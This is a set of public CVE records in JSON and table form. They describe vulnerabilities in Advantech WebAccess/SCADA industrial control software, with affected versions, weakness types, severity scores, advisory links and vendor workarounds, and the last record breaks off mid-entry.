{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T23:57:39.443Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "versions 8.4.1 and prior" } ] } ], "descriptions": [ { "lang": "en", "value": "In WebAccess versions 8.4.1 and prior, multiple stack-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2019-09-18T21:05:50", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-13556", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "versions 8.4.1 and prior" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess versions 8.4.1 and prior, multiple stack-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-13556", "datePublished": "2019-09-18T21:05:50", "dateReserved": "2019-07-11T00:00:00", "dateUpdated": "2024-08-04T23:57:39.443Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-10638
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-128-01 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-599/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-593/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-600/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-603/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-616/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-621/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess Node |
Version: WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:06:10.447Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-599/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-593/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-600/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-603/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-616/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-621/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple heap-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-122", "description": "HEAP-BASED BUFFER OVERFLOW CWE-122", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-05-08T20:06:29", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-599/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-593/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-600/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-603/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-616/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-621/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-10638", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess Node", "version": { "version_data": [ { "version_value": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple heap-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "HEAP-BASED BUFFER OVERFLOW CWE-122" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-599/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-599/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-593/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-593/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-600/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-600/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-603/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-603/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-616/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-616/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-621/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-621/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-10638", "datePublished": "2020-05-08T11:49:32", "dateReserved": "2020-03-16T00:00:00", "dateUpdated": "2024-08-04T11:06:10.447Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-16732
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T20:35:20.409Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2018-01-11T00:00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows an unauthenticated attacker to specify an arbitrary address." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-01-12T01:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-16732", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A use-after-free issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows an unauthenticated attacker to specify an arbitrary address." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-416" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-16732", "datePublished": "2018-01-12T02:00:00", "dateReserved": "2017-11-09T00:00:00", "dateUpdated": "2024-08-05T20:35:20.409Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-6552
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | WebAccess/SCADA |
Version: Versions 8.3.5 and prior. |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T20:23:22.066Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "Versions 8.3.5 and prior." } ] } ], "datePublic": "2019-04-02T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple command injection vulnerabilities, caused by a lack of proper validation of user-supplied data, may allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-77", "description": "IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND (\u0027COMMAND INJECTION\u0027) CWE-77", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2019-04-05T18:02:39", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-6552", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "Versions 8.3.5 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple command injection vulnerabilities, caused by a lack of proper validation of user-supplied data, may allow remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND (\u0027COMMAND INJECTION\u0027) CWE-77" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-6552", "datePublished": "2019-04-05T18:02:39", "dateReserved": "2019-01-22T00:00:00", "dateUpdated": "2024-08-04T20:23:22.066Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0851
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.047Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess before 8.1 allows remote attackers to cause a denial of service (out-of-bounds memory access) via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-01-15T02:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0851", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess before 8.1 allows remote attackers to cause a denial of service (out-of-bounds memory access) via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0851", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.047Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-2866
Vulnerability from cvelistv5
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | WebAccess/SCADA |
Version: 8.4.5 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:33:06.094Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-150-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "WebAccess/SCADA", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "8.4.5" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Marlon Luis Petry reported this vulnerability to CISA." } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\n\n\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eIf an attacker can trick an authenticated user into loading a maliciously crafted .zip file onto Advantech WebAccess version 8.4.5, a web shell could be used to give the attacker full control of the SCADA server. \u003c/span\u003e\n\n" } ], "value": "\nIf an attacker can trick an authenticated user into loading a maliciously crafted .zip file onto Advantech WebAccess version 8.4.5, a web shell could be used to give the attacker full control of the SCADA server. \n\n" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-351", "description": "CWE-351 Insufficient Type Distinction", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-06-07T20:12:46.824Z", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-150-01" } ], "solutions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\n\n\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eAdvantech released a new \u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.advantech.com/en/support/details/installation?id=1-MS9MJV\"\u003eversion V9.1.4\u003c/a\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u0026nbsp;to address the problem by not including these files.\u003c/span\u003e\n\n\u003cbr\u003e" } ], "value": "\nAdvantech released a new version V9.1.4 https://www.advantech.com/en/support/details/installation \u00a0to address the problem by not including these files.\n\n\n" } ], "source": { "discovery": "EXTERNAL" }, "title": "Advantech WebAccess Insufficient Type Distinction", "workarounds": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\n\u003cp\u003eAdvantech recommends users locate and delete the \u201cWADashboardSetup.msi\u201d file to avoid this issue.\u003c/p\u003e\u003cp\u003eIf\n users wish to remedy this problem in version 8.4.5, they can uninstall \n\"WebAccess Dashboard\" from the control panel. Delete all the files:\u003c/p\u003e\u003cp\u003e\\Inetpub\\wwwroot\\broadweb\\WADashboard\u003c/p\u003e\u003cp\u003e\\WebAccess\\Node\\WADashboardSetup.msi\u003c/p\u003e\n\n\u003cbr\u003e" } ], "value": "Advantech recommends users locate and delete the \u201cWADashboardSetup.msi\u201d file to avoid this issue.\n\nIf\n users wish to remedy this problem in version 8.4.5, they can uninstall \n\"WebAccess Dashboard\" from the control panel. Delete all the files:\n\n\\Inetpub\\wwwroot\\broadweb\\WADashboard\n\n\\WebAccess\\Node\\WADashboardSetup.msi\n\n\n\n\n" } ], "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2023-2866", "datePublished": "2023-06-07T20:12:46.824Z", "dateReserved": "2023-05-24T14:09:39.667Z", "dateUpdated": "2024-08-02T06:33:06.094Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-8845
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T07:10:45.902Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a heap-based buffer overflow vulnerability has been identified, which may allow an attacker to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-122", "description": "HEAP-BASED BUFFER OVERFLOW CWE-122", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-8845", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a heap-based buffer overflow vulnerability has been identified, which may allow an attacker to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "HEAP-BASED BUFFER OVERFLOW CWE-122" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-8845", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-03-20T00:00:00", "dateUpdated": "2024-09-17T04:20:14.985Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0859
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-104 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.131Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-104" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Integer overflow in the Kernel service in Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code or cause a denial of service (stack-based buffer overflow) via a crafted RPC request." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-12-01T15:57:02", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-104" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0859", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Integer overflow in the Kernel service in Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code or cause a denial of service (stack-based buffer overflow) via a crafted RPC request." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-104", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-104" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0859", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.131Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-5152
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2017-04 | x_refsource_MISC | |
http://www.securityfocus.com/bid/95410 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess 8.1 |
Version: Advantech WebAccess 8.1 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T14:55:34.908Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2017-04" }, { "name": "95410", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/95410" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess 8.1", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess 8.1" } ] } ], "datePublic": "2017-02-13T00:00:00", "descriptions": [ { "lang": "en", "value": "An issue was discovered in Advantech WebAccess Version 8.1. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access pages unrestricted (AUTHENTICATION BYPASS)." } ], "problemTypes": [ { "descriptions": [ { "description": "Advantech WebAccess AUTHENTICATION BYPASS", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-11-02T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2017-04" }, { "name": "95410", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/95410" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-5152", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess 8.1", "version": { "version_data": [ { 